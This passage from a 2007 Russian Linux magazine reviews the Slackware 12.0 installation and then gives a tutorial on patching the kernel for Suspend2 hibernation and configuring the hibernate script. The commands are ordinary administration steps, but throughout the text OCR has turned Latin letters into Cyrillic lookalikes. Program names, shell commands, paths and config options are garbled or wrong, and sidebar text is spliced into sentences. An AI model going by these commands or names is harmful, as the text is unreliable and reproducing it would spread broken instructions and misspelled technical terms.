дней с незначительными изменениями. Вероятно, это одна из тех отличи- 
тельных черт, за которую Слаку любят многие пользователи и администрато- 
ры: линия разработки дистрибутива постоянна и логична; нет резких рывков 
из стороны в сторону, присущих многим решениям. 

При этом дистрибутив, каки положено, постоянно совершенствуется. Так, 
если в первых версияхдля запуска сервисов существовал только один скрипт, 
то в современном варианте это уже некий гибрид ВБО-стиля и Бузіегш V, где 
используются отдельные каталоги для каждого уровня запуска. Теперьдля 
удобства управления стартовые скрипты для каждого уровня размещаются в 
отдельных файлах, а каждый сервис имеетсвой гс-файл. Крометого, возможна 
имитация стиля Бузіегп Ѵдля совместимости с некоторыми сервисами. 
Стабильность — еще одно неоспоримое качество, которое ценят опытные 
пользователи в Біаскѵѵаге. Релизы выходят относительно нечасто, в сред- 
нем раз в год, зато всетщательно протестировано и отлажено. Одновре- 
менно развиваются две ветки: 
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1. 5*аЫе — стабильный релиз, которому присвоен номер; изменения 
производятся только в исключительных случаях. 

2 . Сиггепі — текущее дерево разработки, изменения сюда вносятся прак- 
тически ежедневно, через некоторое время эта ветка становится зіаЫе. 
Зіаскѵѵаге І_іпих будет на своем месте на рабочей станции и не подведет, 
если поручить ему сервер. На ОІБІхоѴѴаІюЬ этот дистрибутив без всяких 
длинных вступлений назван лучшим. 1 июля 2007 года был анонсирован 
19-й посчету релиз Слаки — 12.0. Пора и нам с ним познакомиться. 

тонового? 

С момента выхода предыдущей версии 1 1 .0 прошло ровно 9 месяцев. 
Для современного мира с его гонкой дистрибутивов это большой срок, 
но для Зіаскѵѵаге это обычный интервал между выходами релизов. 
Работа проделана немалая. Самым главным событием стало проща- 
ние с веткой 2.4. Теперь в основе дистрибутива лежит ядро 2.6.21 .5 с 
поддержкой АТА и ЗоіТѵѵаге РАЮ, ЬѴМ, шифрованных файловых систем 
и X йРІ для работы 30-ускорения видеокарт. Чтобы с дистрибутивом 
мог работать пользователь сплохимзрением.в ядро добавлен специ- 
альный патч для поддержки синтезаторов речи. В новом Зіаскѵѵаге в 
качестве Х-сервера использован более гибкий X. О гд 7.2.0 с графиче- 
скими оболочками ХЮе 4.4.1 и КОЕ 3.5.7, хотя есть и другие. Использо- 
вание ІЮ ЕѴ и НАС упрощает настройку железа, да и администратору 
достаточно добавить пользователя в группу сбгот и ріидсіеѵ, чтобы тот 
смог подключать ІІ5В-устройства и монтировать СО/В\Ю. В качестве 
компилятора поумолчаниюдляС, С++, ОЬіесбѵе-С, Рогігап -77/95 и Аба 
95 использован ѲСС4.1 .2, а ѲИЬс версии 2.5 имеет неплохую совмести- 
мость с уже откомпилированными приложениями. 



Особо разработчики отмечаютулучшенную поддержку широкого спектра 
периферийных цифровыхустройств. Функционирует все, что нужно для 
беспроблемной работы Зіаскѵѵаге на ноутбуке: РСМСІА, СагбВиз, 115В, 

I ЕЕ 1 394 (ЕігеѴѴІге) и АСРІ. А в остальном это всета же Слака. 

Пользователи могут обновить версию 1 1 .0 до 12.0, используя скрипт 
зіаскркд. Вся эта долгая и запутанная процедура описана в файле 
СНАМ0Е5_АМ0_Н1ЫТ5.ТХТ. Но, на мой взгляд, намного проще установить 
дистрибутив заново, предварительно сохранив нужные файлы. 

УСТАН0ВКА5І.АСКѴѴАКЕ 

Системные требования дистрибутива по-прежнему не велики и на 
сегодняшний день, видимо, являются самыми низкими среди осталь- 
ных дистрибутивов, ориентированных на настольное применение. Для 
работы потребуется компьютер класса І486, хотя при построении пакетов 
для улучшения производительности в более новых системах исполь- 
зуется оптимизация -тсри=і686. Объем оперативной памяти и размер 
диска зависят от планируемыхзадач и использованиях. Кроме Іпіе1х86 
официально поддерживается только архитектура ІВМ 5/390 (51аск/390). 
Однако есть неофициальные порты АРМ, АІрЬа, 5РАРС, РоѵѵегРС и х86-64 
(51атб64, ѵѵѵѵѵѵ.5ІатсІ64.сот ). 

Поумолчанию в версии 12.0 присутствует только две оконные среды 
— КОЕ и ХЕСЕ. 6КІ0МЕ нет. Существуютспециальные проекты бгорііпе 
ОЫОМЕ [ ѵѵѵѵѵѵ.сігорііпедпоте.огд і. Егеегоск ОЫОМЕ, ѲѴѴАРЕ, предлагаю- 
щие Зіаскѵѵаге с этим рабочим столом или пакеты для его установки. Раз 
уж пошел разговор о дистрибутивах, базирующихся на Слаке, следует 
вспомнить и ОеерЗіуІе [ сІеерзМе.огд.иа ]. который представляетсобой 
локализованную версию Зіаскѵѵаге, а также канадский ѴесФгЫпих 
[ ѵѵѵѵѵѵ.ѵесіогііпих.сот і — самый дружественный Зіаскѵѵаге. Но вернемся к 
нашему имениннику. 

Списокзеркал, с которых можно получить дистрибутив, есть по адресу 
зіаскѵѵа ге.сот/деізіаск . Возможна закачка как через НТТР и РТР, так и 
через ВііТоггепі. По сравнению с версией 1 1 .0, дистрибутив заметно при- 
бавил в весе. Теперьдля закачки предлагается 6 СО (Зустановочных и 3 с 
исходнымитекстами) или 1 ОѴО-диск. Традиционно на диске размещены 
инструменты, позволяющие загрузить 5 Іа с кѵѵаге практически в любой 
ситуации. Так, если на компьютере старая версия ВІ05, не поддерживаю- 
щая загрузку с Сй-РОМ, то для создания загрузочной дискеты в ѴѴІпбоѵѵз 
и 005 можно использовать наборутилит РАѴѴРІТЕ или загрузиться с 
помощью ЮоасІ Іі п . Под Ыпихэто сделать не сложнее: 

# МТогшаД /сіеѵ/Тсі0и1440 

# саЪ депегіс.з > /сІеѵ/ТсІО 

В каталоге изЬ-апсІ-рхе-іпБіаІІегБ, расположенном на втором загрузоч- 
ном диске, ты обнаружишь образы, позвол я ющие за грузить Зіаскѵѵа ге с 
помощью РХЕ или 115В. 

Как и ранее, Зіаскѵѵаге имеет несколько ядер, найти которые можно в 
каталоге кегпеіз первого диска. Их список в последних релизах сокращен 
до ПЯТИ: 

1. Ьидезтр.Б — ядро, используемое поумолчанию и поддерживающее 
мультипроцессорные системы и НурегТгеасІіпд ; все составляющие ском- 
пилированы вместе с ядром, поэтому его размер равен 4,5 Мбщребует 
как минимум Репііит Рго и является рекомендуемым для большинства 
случаев, втом числе и для однопроцессорных машин; 

2. биде . б — сборка аналогична Ьидезтр.Б, но поддерживает один про- 
цессор и рекомендуется для старых систем с процессором класса І486 и 
48 Мб ОЗУ; 
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3. зреакир.з — сборка аналогична биде. 5, нос патчем, поддерживающим 
синтезаторы речи; 

4 . деп5тр.5 — сборка по параметрам аналогична Ьидезтр.з, но все пара- 
метры вынесены в модули; для его работы требуется іпіігсі, иначе ибеѵ не 
сможет загрузить модули; 

5 . депегіс.з — версия Ниде.зс использованием модулей, также требует 
іпіігб. 

Все ядра изначально поддерживаютЗСЗІ-устройства и популярные 
файловые системы (ХЕ5, ЗЕ5 и прочие), поэтому не нужно подбирать ядро 
под эти параметры, какэто было в более ранних версиях. 

Итак, вставляем первый установочный диск в привод и загружаемся. По- 
сле появления приглашения «Ьоо1::»жмем <Епіег> для загрузки Ьидезтр.з 
или вводим в строке приглашения нужное ядро: 

ЬооД : зреакир.з 

Через некоторое время система попросит выбрать раскладку клавиатуры, 
поумолчанию предлагая 115. Весь список можно просмотреть, нажав «1 ». 
Далее регистрируемся как гооі (без пароля) и получаем приглашение 
интерпретатора. У Зіаскѵѵаге нет единой программы установки, которая 
бы провела за ручку через все этапы. Вместо нее нам предоставляется 
четыре варианта действий: 

Ос помощью утилиты сбсіізк или бсі ізк (есть и рагіеб) создать разделы для 
установки Зіаскѵѵаге; 

2 ) для активации РСМСІА-устройств ввести в консоли рстсіа; 

3) для активации сетевыхустройств ввести пеіѵѵогк; 

4 ) начатьустановку, введя зеШр. 

Набираем зеіир и попадаем в меню псигзез, которое содержит? пунктов. 
В НЕБР нас ждет помощь, в КЕУМАР выставляем русскую раскладку 
клавиатуры (например, д\л/егіу/ги_ѵѵіп.ппар), для подтверждения выбора 
в следующем диалоговом окне нажимаем «1 », хотя кириллицу ввести в 
консоли пока не получится. 

Пункт А005ѴѴАР позволит отформатировать, подключить и прописать 



своп-раздел в файлМсДзІаЬ. Если он есть, программа установки найдет 
его на диске сама (если не найдет, будет сильно ругаться). Тебе надо будет 
только соглашаться с предлагаемыми вариантами. После этого программа 
перейдет к пун ктуТАРОЕТ, в котором сначала необходимо указать раздел, 
который будет корневым. Выбрав в следующем окне Еогтаі, производим бы- 
строе форматирование без проверокна сбойныеблоки (еслитакая проверка 
нужна, выбираем Зіоѵѵ). Отказаться от форматирования можно выбором Ыо. 
Из файловых систем для форматирования предлагается ех12/3, РеізегЕ5,ХЕ5 
и ЗЕ5. Далееаналогичнуюоперацию проводим и состальными разделами, 
указывая нужныеточки монтирования. Для перехода к следующему шагу 
выбираем Сопбпие. При наличии ЕАТ- и ЫТЕЗ-разделов программа пред- 
ложит занести данные о них в/еІсЛзІаЬ. Разрешаем, не вручную же их потом 
вбивать. Просто отмечаем раздел и указываем точку монтирования. 

В 501ІРСЕ М Ей ІА 5ЕЕЕСТІ0Ы выбираем источникустановки из пред- 
ложенного списка: С Б- ПО М, жесткий диск, ЫЕ5 или смонтированный 
каталог (последний вариант довольно гибкий, поскольку позволяет 
устанавливать систему практически слюбого источника, который можно 
смонтировать). 

И, наконец, выбор пакетов, если быть точнее, групп пакетов. Историче- 
ски так сложилось, что все пакеты в Слаке распределены по сіізкзеіз, 
что позволяет, не рыская в куче дискет, сразу выбрать для установки то, 
что необходимо. Теперь этот подход используется для структуризации 
программного обеспечения. Кстати, для того чтобы локализовать КОЕ, не 
забудь выбрать КОЕІ. 

Отметив нужные группы, переходим к5ЕІ_ЕСТ РР0МРТ1Ы0 МОБЕ, где 
предлагается указать режим установки. В самом простом случае выби- 
раем би Ц и идем пить пиво. Будут установлены все пакеты в отмеченных 
группах. Но учти, что для этого нужно более 4,5 Гб свободного места. 

При указании варианта пеѵѵбіе программа установит основные пакеты и 
будут заданы вопросы о необходимости установки остальных. Придется 
немного понажимать клавиши, нозато можно будет выбрать то, что дей- 
ствительно нужно. Пункты теп и и ехрегі позволяют определить группы 
пакетов и пакеты с помощи меню, а в сизіот и іадраіЬ придется править 
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ХАКЕР 09 / 1 05 / 07 







Устанавливаем оконный менеджер по умолчанию 

файлы, из которых берется информация обустанавливаемых пакетах. Это 
оченьудобный способ, если необходимо установить систему на большое 
количество компьютеров. 

После выбора программа, собственно, и начнетустановку. По мере необ- 
ходимости будутзапрошены остальные диски (если это не 0Ѵ0). 

На этом этапе инсталлятор повел себя несколько странно. Пожужжав 
пару минут, каретка привода выехала, и был запрошен следующий диск. 
Второй дискбыл проглочен минутза 5, атретий практически нетронут. 
После перехода к последнему пункту инсталлятор дальше работать 
отказался, сославшись на то, что не может найти некоторые утилиты. 
Проверив раздел, куда устанавливался Зіаскѵѵаге, я обнаружил, что он 
заполнен всего на 1 Гб, что было очень подозрительно. При повторной 
установке я получил туже картину. Тогда на запрос следующего диска 
вместо второго я оставил в приводе первый. После это го установка про- 
шлауспешно. Раньшеустановщиктак не шутил. 

Пришло время последнего пункта С0ЫЕІ61ІПЕ. Здесьустанавливаем 
пароль гооі, настраиваем загрузчик І_ІІ_0. Еслитебе по душе 6ПІІВ, можно 
пока про пустить этот пун кт, выбрав 5кір. Затем, загрузившись с диска, 
устанавливаем 6ПІІВ, находящийся в каталоге ехіха на третьем диске, и 
запускаем скрипт дгиЬсопбд, который сделаетвсе необходимое. Настраи- 
ваем модем, мышь, клавиатуру, сеть, выбираем часовой пояс, указываем 
оконный менеджер, который будет загружаться поумолчанию. В списке 
оконных менеджеров кроме КИЕ иХЕсе присутствуют ГихЬох, ЫаскЬох, 
ѴѴіпбоѵѵМакег, ЕѴѴѴМ2 и іѵѵт. Из новинокбыло предложено создать загру- 
зочный ІІЗВ-диск, что вполне логично, поскольку все ядра на дискету не 
поместятся, да и дискетами практически никто уже не пользуется. 

Все, Зіаскѵѵаге Ыпихустановлен. Каквидишь, ничего лишнего, нозато 
все просто, и Слака, в отличие отдругих дистрибутивов, установится 
всегда. Вне зависимости оттого, правильно ли определил инсталлятор 
оборудование и смогли подобрать драйверы к видеокарте. Те, кто хоть 
раз пытался втакой ситуации установить ЕіѵеСО ІІЬипШ или Мапбгіѵа, 
оценят простотуЗІаскѵѵа ге. 

ВОТ ТЫ КАКОЙ, 5І.АСКѴѴАКЕ 

Первая загрузка происходит в консоли. Не поленись почитать почту 
гооГа. В первом письметебя попросятзарегистрироваться какпользо- 
вателя Еі п их на сайте соипіег.іі.огд . Во втором Патрик Волкердинг кратко 
расскажет об особенностях настройки тех или иныхустройств в дистри- 
бутиве, после прочтения многие возникшие вопросы отпадут сами собой. 
Если сейчас ввести віагіх, в режиме ІгатеЬиЕегзапустится Х-ѴѴІпбоѵѵс 
оконным менеджером, выбранным при установке. Через ІгатеЬи^ег ра- 
бота идет довольно медленно, да и частота развертки не фонтан. Поэтому 
далее необходимо настроить Х-сервер вручную. Для этого используются 
утилиты хогдсбд, хогдсопГд и хогдзеіир. Последняя, вероятно, покажется 
самой удобной. Как вариант, можно просто ввести в консоли: 

# X -сопСідиге 

Затем попробовать загрузиться с новым файлом: 

# X — сопбід /гоок/хогд . сопб . пеъг 
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Если все нормально, копируем файл на свое место и загружаемся. 
Кстати, сразу после настройки вывод д Іхі пбо показал, что для моего 
Радеона «сіігесі гепбегіпд: Уев». Поэтому в Слаке сразу можно запус- 
кать трехмерные игры. Чтобы вместо КО Е по умолчанию стартовал 
другой оконный менеджер, следует вызвать утилиту хѵѵт со пбд или 
подправить символическую ссылку на файл /еіс/ХІ І/хіпК/хіпКгс. Для 
загрузки сразу в графическом режиме в файле /еЕ/іпіЕаЬ в строке 
«ісі :3 :іп іісіебаи и» цифру 3 меняем на 4. 

Как и ранее, графическая среда оставлена втом же виде, в каком она 
предлагается самими разработчиками. Никаких эффектов, ника- 
ких красивых обоев и тем. Все эти украшательства отданы на откуп 
пользователю, который сам примет решение отом, какбудет выглядеть 
его рабочий стол. Хотя стоит отметить появление в списке пакетов Зй 
рабочего стола СотрЕ. 

ПРОГРАММЫ И УПРАВЛЕНИЕ ПАКЕТАМИ 

Дистрибутив содержит около 800 пакетов (для сравнения, ІІЬипІи 
говорит, что знает о 21 000), состав которых способен удовлетворить за- 
просы большинства пользователей и администраторов. Здесь Могіііа 
Рігебох ТИипсІегЬігсІ 2. 0.0. 4, ЗеаМопкеу 1.1.2, АрасЬе 2.2.4 с РНР 5.2.3, 
МуЗСИ 5.0.37, проигрыватели, программы для записи дисков, работы с 
графикой и т.д. Система управления пакетами позволяет пользователю 
устанавливать, обновлять или удалять пакеты также легко, как и ана- 
логичные системы других дистрибутивов. Но, в отличие от них, никакие 
зависимости между пакетами по умолчанию не отслеживаются, хотя 
такая возможность присутствует. Все программы управления пакетами 
Зіаскѵѵаге находятся в наборе ркдіооів. Пользователи ОеЬіап, привык- 
шие к АРТ, найдутсистему несколько неудобной. Приходится заранее 
скачивать пакет, а потом его устанавливать. Но сейчас существует 
несколько настроек, позволяющих автоматизировать весь процесс 
обновления системы прямо по сети и отслеживающих зависимости па- 
кетов: віарі-дер вѵѵагер віаскркд. Они не входят в стандартный набор, 
но віаскркд доступен в/ехіга. 

# ссі /шпЦ/ссЗгош/ехЦга/зІаскркд 

# іпзкаііркд з1аскркд-2 . бІ-поагск-2 . кдз 

Теперь раскомментируем в/еЕ/вІаскркд/тіггогв одно из зеркал. Вво- 
димвіаскркд ирбаіе и устанавливаем пакеты, каквАРТ. Кромеэтого, 
тысячи готовых пакетов можно найти в неофициальных репозитариях: 
[тихраскадев.пе Е зіаскѵ.еи . ЗІаскВиіІсІз.огд . 

Если скопилось много грт-пакетов, то они тоже не пропадут: исполь- 
зуя утилиту грт2і:д2, можно попробовать их перестроить. Утилита 
віаскігаск (в ехіга) поможеттебе создать свой пакет из откомпилиро- 
ванного приложения. 

В общем, Слака — она и в Африке Слака. Перед нами старый знако- 
мый с обновленными приложениями, работающий также стабильно и 
требующий такихже усилий по его окончательной доводке, как и прежде. 
В настройке тебе поможет документация, доступная на дисках. Кроме 
того, не стоитзабывать и об официальном руководстве Зіаскѵѵаге Ыпих 
Еззепііаіз, которое ты найдешь по адресу ѵѵѵѵѵѵ.вІаскЬоок.огд .^-г 
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ООАВВЫСЕ & ВЕОМ ВЕОТЮЕВ 

/ ВЕОТІСЕВѲМАИ..КІІ / 



Заморозь 

своего 

пингвина 

5игрепсІ2: отправляем І_іпих в спячку 



БЫВАЮТТАКИЕ СИТУАЦИИ, КОГДАУ 
ТЕБЯ ОТКРЫТО С ДЕСЯТОК ОКОН, ТБІ 
ВЕСЕ В РАБОТЕ, У ТЕБЯ ЧТО-ТО КОМПИ 
ЛИРУЕТСЯ, РЕДАКТИРУЕТСЯ, ИГРАЕТСЯ, знакомься: зікРЕмог 

В подобном случае на помощьтебе придет5изрепб2 [ \ллллллзизрепс12.пе1 ]. 
Почему именно он? Во-первых, это активно развивающийся и успешный 
проект, который в свое время отделился отзѵѵзизр и сейчас ведется неза- 
висимо. Во-вторых, он обладает вкусностями, мимо которых не пройдет 
ни истинный ли нуксоид, ни просто любитель компьютеров. Вот основные 

ИЗ НИХ: 

• динамическая и быстрая компрессия образа памяти (поумолчанию 
используется метод І_2Р); 

• полная поддержка асинхронного или предупреждающего чтения- 
записи; 

• поддержка любого количества своп-разделов или файлов; 

• возможность безопасного прерывания процесса засыпания нажатием 
клавиши <Езс>; 

• возможность записи полного образа памяти; 

• поддержка сжатия и кодирования записываемого образа; 

• дружелюбный графический интерфейс; 

• поддержка больших объемов памяти (на настоящий момент вплоть до 
4 Гб), многопроцессорных систем; 

• поддержка скриптов; 

МЕСТО, ГДЕ ОСТАНОВИЛСЯ, И СПОКОЙНО • можетбыть полноценной заменой стандартному зѵѵзизр. 

Если коротко, то 5изрепсІ2 сохраняет содержимое РАМ компьютера и 
ПРОДОЛЖИТЬ ПРОЦЕСС. выключаетпитание. При следующем включении он восстанавливает 



РЕЖЕТСЯ И ТУТ ВДРУГ ТЕБЕ СРОЧНО 
ТРЕБУЕТСЯ ВЫКЛЮЧИТЬ КОМПЬЮТЕР 
НАПРИМЕР, ТВОЙ ВЗГЛЯД ПАДАЕТ НА 
ЧАСЫ, ИТЫ ПОНИМАЕШЬ, ЧТОУЖЕ 
ПЯТЬ УТРА И ПОРА БЫ ПОЙТИ НЕМНОГО 
ВЗДРЕМНУТЬ. ВТАКИЕ МОМЕНТЫ ХО- 
ЧЕТСЯ ПРОСТО ЗАМОРОЗИТЬСИСТЕМУ, 
ЧТОБЫ ПРИ СЛЕДУЮЩЕМ ВКЛЮЧЕНИИ 
КОМПЬЮТЕРА ТЫ МОГ ВЕРНУТЬСЯ ВТО 
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содержимое РАМ, и ты можешь продолжать работу как ни в чем небывало 
— нет необходимости снова запускать программы, открывать документы, 
терминалы и т.д. 

Что нужно для успешной установки и работы 5иврепб2? В принципе, 
если у тебя современный компьютер на базе процессора Репіиіт и ЮЕ- 
диски, а также свежее ядро ветки 2.6, то 5иврепсІ2 с большой вероят- 
ностью будет работать без проблем. В частности, для корректной работы 
необходима поддержка процессором инструкции рве или рвеЗб (раде 
вІ 2 е ехіепвіопв). 

Проверяем: 

$ саД /ргос/сриіпТо I дгер Тіадз 

Тіадз: Три ѵте сіе рзе Тзс тзг рае тсе сх8 аріс зер тТгг 
рде тса стоѵ раТ рзеЗб сІТІизЪ сІТз асрі шшх Тхзг ззе 
ззе2 зз ІіР Тт рЬе сісі хррг 

Ксожалению, в связи с некоторыми разногласиями среди кернел-хаке- 
ров 5иврепб2 не включен в ванильные ядра, и, чтобы его использовать, 
нам придется наложить патч и перекомпилировать ядро. 

ГОТОВИМ ЯДРО 

Сперва убедись, что исходники работающего в данный момент ядра лежат 
в/ивг/вгс/ііпих (дефолтовое место для большинства Ыпих-дистрибутивов). 



Если же этого каталога утебя нет или он пуст, значит исходники ядра, ско- 
рее всего, не установлены. Ничего страшного. На каждом прилагаемом к 
журналудиске есть новые ванильные ядра пингвина. Именно ванильные 
ядра (то есть чистые ядра с кегпеі.огд безо всяких патчей, одобренные 
Линусом Торвальдсом) наиболее подходят для 5изрепб2. 

НАКЛАДЫВАЕМ ПАТЧ 

Итак, у насустановлены исходники рабочего ядра. Еслиты используешь 
новое ядро, сначала убедись в его работоспособности (отконфигурируй, 
откомпилируй, установи и загрузись с него). Пришло время прикрутить 
5иврепсІ2. Идем на ѵѵѵѵѵѵ.5цврепсІ2.пеі/сІоѵѵп[оасІ5 . выбираем подходя- 
щий под нашу версию ядра патч и скачиваем его. Например, для версии 
2.6.19.2 скачиваем виврепсІ2-2.2.9-1 : ог-2.6.19.ра1;сЬ.Ь22. В общем случае 
ядра версий 2.6.Х.У не сильно отличаются от версий 2.6.Х, поэтому для них 
возможно использование одного итого же патча. 

# Ѵ7деѣ ЪТТр: / /шяѵі . зизрепсі2 . пеД/сіоѵшІоасіз/аІІ/ 
зизрепс!2-2 . 2 . 9-Тог-2 . б . 19 . раДсІт . Ьг2 -Р /Дшр 

Командуем (путь и версия патча утебя могутбыть другими): 

# ссі /изг/згс/ііпих 

# ЬгсаТ /Ттр/зизрепсі2-2 . 2 . 9-Тог-2 . 6 . 19 .раТс1і.Ь22 | 
раТсЪ -рі 

Если ты подобрал правильную версию, то никаких отклонений быть не 
должно. Если утебя не ванильные ядра, а скорее всего, таконо и есть, 
поскольку почти каждый дистрибутив использует собственные пропат- 
ченные версии, то может возникнуть несколько несоответствий (режек- 
тов). В этом случаеутебя естьтри возможности: 

• найти пропатченные версии ядердля своего дистрибутива; 

• вручную пропатч итьте файлы, в которых найдены несоответствия; 

• установить ванильное ядро. 

КОМПИЛИРУЕМ ЯДРО 

Теперьделаем таке теписопбд, загружаем нашутекущую рабочую кон- 
фигурацию и приступаем к настройке ядерной поддержки 5иврепб2. 
Сперва убедимся, что в секции Собе Маіи гііу отмечен Рготрі: Іюг 
беѵеіортепі апб/ог іпсотріеіе собе/бгіѵегз, включающий некоторые 
тестовые опции в конфигурировании ядра. Затем заходим в секцию Роѵѵег 
тападетепі орііопв (АСРІ, АРМ) и видим там новый пункт — 5иврепб2. 
Отмечаем его и тут же заходим в подменю. 

Здесь нужно сделать паузу и решить, что мы будем использовать в качест- 
ве буфера: специальный файл на жестком диске или раздел подкачки. За 
это отвечаютдве опции: Рі Іе Аііосаіог и Зѵѵар АНосаІог. В принципе, можно 
отметить оба пункта и решать, откуда грузиться, в самом загрузчике (смот- 
ри далее). Должен быть отмечен хотя бы один пункт. Другие опции можно 
оставить поумолчанию. 

Теперь идем в раздел СгуріюдгарЬіс орбопв, находим пункт \ЛР 
сотргеввіоп аідогіібт и включаем его. Заметь, он должен быть встро- 
ен непосредственно в ядро, а не включен в виде модуля, иначе сжатие 
работать не будет. 

Если утебя карточка отІЧѵісІіа на шинеАСРиты не хочешь при пробуждении 
лицезреть темный экран, в ядре необходимо отключить а дрдагі — под- 
держку АѲР, включенную поумолчанию. Удрайверов от Ыѵібіа естьсвоя 
поддержка этой шины: заходи в секцию Оеѵісе Огіѵегв, подсекцию СИагасіег 
беѵісевдам находи пункт/беѵ/адрдагі: (АСРЗиррогі) и выключай его. 

Если эта версия ядра не использует ІпіігсІ/ІпіігагтТв, то здесь можно 
сохраняться, компилировать ядро (таке && таке тосІиІе5_іп5іаЩ и 
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• ги.депіоо-ѵѵікі. 
сот/5изрепсІ2 

• зизрепсі. 
зоигсеіюгде.пе і: 

• Ііпих.уа гозіаѵі.ги/ 
сІосз/сопіУкегпеІ-- 
2.6-іпзІаЦ-І .1 .Ыті 

• ѵѵѵѵѵѵ.ореппеЕ 
ги/Ьазе/зѵзЛіпих 
кегпеі сотрНе.М. 
Ніті 




На прилагаемом к 
журналу диске ты 
найдешь полную 
версию этой статьи 
и весь необходимый 
софт. 







> ІП^О 

Если ты заинтере- 
совался, почитай 
документацию, иду- 
щую с исходниками 
ядра, в каталоге 
□ осиппепіабоп/ 
роѵѵег. 




Основная страница проекта 5изрепсІ2 

переходить к следующему пункту. Если же ты задействуешь 
ІпіігсІ/ІпіігагтНБ, тогда вручную включи пробуждение: моди- 
фицируй создание ІпіігсІ/ІпіІгапЛздля своего дистрибутива 
или измени скрипт Ііпихгс или іпіі, добавив туда строчку 
«есбо 1 > /5у5/роѵѵег/5и5репб2/бо_ге5иппе». Здесь важно 
обратить внимание на следующий момент. Указанная строч- 
ка должна идти ПЕРЕД тем, как ІпіігсІ/Іпіігаті'з монтирует 
файловую систему. Если еетам не окажется, пробуждение 
не будет возможным. Если же эта строчка будет идти после 
монтирования файловой системы, та можетбыть разрушена! 
Помни об этом. 

НАСТРАИВАЕМ 51І5РЕМ02 

Теперь, прежде чем перезагружаться, необходимо 
провести первоначальную настройку 5и5репсІ2. 
Управлять 5и5репсІ2 можно через виртуальный ка- 
талог /зуз/роѵѵег/зизрепс^, составляя свои скрип- 
ты для пробуждения/восстановления системы, но 
удобнее всеже пользоваться готовым решением 
— КіЬегпаІе -скриптом, который будет делать всю 
работу за нас. Скачиваем ЬІЬегпаіе-скрипти уста- 
навливаем его: 

$ ѵ^деД ЫсОр : //ѵтѵі. зизрепс!2 . пеО/сІоѵтІоасІз/ 
аІІ/МЪегпаДе-зсгірО-1 . 95 . Даг . дг 
$ Даг хгТ МЪегпаЕе-зсгірО-1 . 95 . Даг . дг 
$ ссі МЬегпаДе-зсгірЦ-1 . 95 
$ зисіо . /іпзОаІІ . зЬ 

Сам скриптпоумолчанию инсталлируется в/іібг/бЬіп, а 
конфигурационные файлы (их можетбыть несколько) поме- 
щаются в каталог/еіс/ЬІЬегпаіе. Для пользователей Сепіоо 
и ОеЬіапуже есть включенный в их дистрибутивы ЫЬегпаіе- 

БСГІрІ. 

По умолчанию настройки 5изрепб2 разбиты на три 
файла конфигураций: ЬІЬегпаІе.сопф 5изрепб2.сопі : 
и соттоп.сопЕ Вообще говоря, никто не мешает нам 
собрать их все в один главный файл (ЬІЬегпаіе.сопЛ , но 
мы пойдем по пути наименьшего сопротивления. Нач- 
нем с первого и отредактируем файл /еІю/ЫЬегпаІе/ 
ЫЬегпа^е.сопЕ 

# ѴІМ /ЕТС/НІВЕРМАТЕ/НІВЕРМАТЕ.СОМР 

ТгуМеЫтоВ. зизрепсі2 . сопб 
#ТгуМеДІтосі сіізк.сопб 
#ТгуМеД]то(і гаш.сопб 

Так как мы используем Зизрепсі 2, оставляем только его; 
бізк.сопіигат.соп^намне понадобятся. Дальше смотрим 
файл /е1с/ЫЬегпаіе/5и5репб2.сопТ 




Страница закачки патчей и скриптов 

# ѴІМ/ЕТС/НІВЕРМАТЕ/51І5РЕМ02.С0МР 

Цзе8изрепс12 уез 
КеЬооД по 
ЕпаЫеЕзсаре уез 
БеТаиІОСопзоІеЬеѵеІ 1 
Сотргеззог 1 7.1 
ЕпсгурРог попе 

Іпсіисіе соштоп . сопб 

Здесь находятся общие для 5изрепсІ2 настройки. Первая 
строчка — «ІІзе5изрепсІ2уе5» — говорит о том, что мы будем 
использовать именно 5изрепсІ2 (а иначе зачем мы вообще 
все это затеяли?). Опция ПеЬооі решает, хотим ли мы пере- 
загружаться сразу послезаморозки. Строчка «ЕпаЫеЕзсаре 
уез» позволит нам отменить процессзаморозки нажатием 
клавиши <Ебс>. Опция ОеІюиІІіСопзоІеЕеѵеІустанавливает 
вид отображения при заморозке и разморозке (0 — простой 
прогресс-бар, 1 — прогресс-бар с процентами, 2 и выше 
выдает обильную отладочную информацию о происходящем). 
Опции Сотргеззог и Епсгуріогопределяют методы сжатия 
и шифрования образа. Их имена можноузнать, выполнив 
команду саі/ргос/сгурію. Здесьже можно определитьеще не- 
сколько важныхзначений, которые мы рассмотрим позднее. 
Теперь переходим к основным настройкам, собранным в 
файле/еіс/ЫЬегпаіе/соттоп.сопЕ Подробнее остановлюсь 
на, пожалуй, самых главных из них, остальные™ можешь 
изменить по своему вкусу, сверяясь с ЫЬегпаіе.сопЛб). 
ІІптоиЫЕЗТурез — здесь можно перечислить типы файло- 
вых систем, которые нужно размонтировать перед замо- 
розкой, например «ІІптоипіЕЗТурез зтЫз Ыз пЛз ѵіюі». В 
принципе, если утебя есть конкретнозаданныеустройства, 
можно размонтировать их в пункте ІІптоипІ (например, 

« И птоипі/тебіаЛл/іпС/теб Іа/Му Ноте Ыеіѵѵогк»). Их же 
нужно монтировать обратно при пробуждении в пункте Моипі 
(«Моипі/тебіа/ѵѵіпС/тебіа/МуНотеЫеІѵѵогк»), 5изрепб2 не 
сделает это автоматически. 

ПунктІМоасІМосІиІез позволяет перечислить модули, 
которые надо обязательно выгрузить перед заморозкой, но 
можно воспользоваться пунктом «ІІпІоабАИМобиІезуез» для 
выгрузки всех модулей или «ЫІпІоасІ Віаскіізііесі Мосіиіез уез» 
для выгрузки тех модулей, чьи имена перечислены в файле 
Мс/ЬІЬегпаіе/ЫаскІізІесІ-тосІиІез. 

Пункт ЕоабМобиІез дает возможность задатьимена 
модулей, загружаемых при пробуждении («ЕоасІМосІиІезаЫо» 
автоматически загрузит все модули, которые были выгружены). 

В пункте ОоѵѵпІЫегіасез можно указать сетевые интерфейсы, 
которые следует отключить перед засыпанием, а «Ііріпіегіасез 
аиЬ» автоматически запустит все остановленные интерфейсы 
при пробуждении. 
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Примерно так может происходить процесс засыпания 

Пункт РезІагіЗегѵісез позволяет запускать/останавливать перечислен- 
ные здесь службы. Имена служб должны соответствовать названиям 
скриптов в каталоге іпіі.сі и бытьактивными на этом уровне запуска 
(гипіеѵеі). 

С помощью ЗѵѵіІсЬТоТехіМосІе во время засыпания можно переключаться 
втекстовый режим, а при пробуждении возвращаться обратно кХ’ам. Это 
может быть полезно, если при пробуждении В 105 не восстанавливает 
твой графический адаптер и ядро не можетего опознать. 

Опция ІІзеОиттуХЗегѵег поможет в ряде случаев, например, когда при 
пробуждении на некоторых видеокартах наблюдается потеря ускорения в 
